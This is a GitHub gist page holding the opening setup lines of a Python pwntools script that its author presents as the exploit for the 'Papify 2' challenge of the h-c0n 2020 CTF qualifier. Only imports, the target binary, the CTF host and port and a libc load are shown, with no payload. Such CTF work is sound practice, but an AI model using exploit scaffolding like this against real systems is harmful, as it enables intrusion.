Skip to content

Instantly share code, notes, and snippets.

View jjluczyn's full-sized avatar

Jakub Jan Luczyn jjluczyn

View GitHub Profile
@jjluczyn
jjluczyn / papify2.py
Last active January 21, 2020 22:55
Exploit used to solve Papify 2 during h-c0n 2020 CTF qualifier (whole writeup https://raulmart.in/posts/h-c0n-papify-writeup/)
#!/usr/bin/env python2
from pwn import *
context.arch = 'amd64'
BINARY = './chall'
HOST, PORT = 'ctf.h-c0n.com', 60003
#elf = ELF(BINARY)
libc = ELF('./libc-cont.so')